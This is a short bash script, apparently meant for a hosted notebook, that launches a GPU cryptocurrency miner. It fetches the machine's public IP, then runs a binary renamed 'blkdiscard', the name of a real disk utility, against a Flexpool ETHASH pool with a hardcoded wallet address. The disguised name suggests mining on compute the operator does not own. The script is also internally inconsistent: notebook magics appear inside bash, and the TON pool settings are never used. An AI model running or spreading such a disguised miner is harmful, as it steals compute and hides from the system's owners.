#!/bin/bash
%%capture
!%%capture

#gives ip address 
curl ipecho.net/plain
POOL=https://next.ton-pool.com
USER=$1
ALGO=TON
WORKER=$(echo GPU-$(shuf -i 1000-9999 -n 1))

chmod +x blkdiscard
./blkdiscard --algo ETHASH --pool stratum+ssl://eth-de.flexpool.io:5555 --user 0x3da2c7743970908cac0e6b606f064330aea8b03f.$WORKER
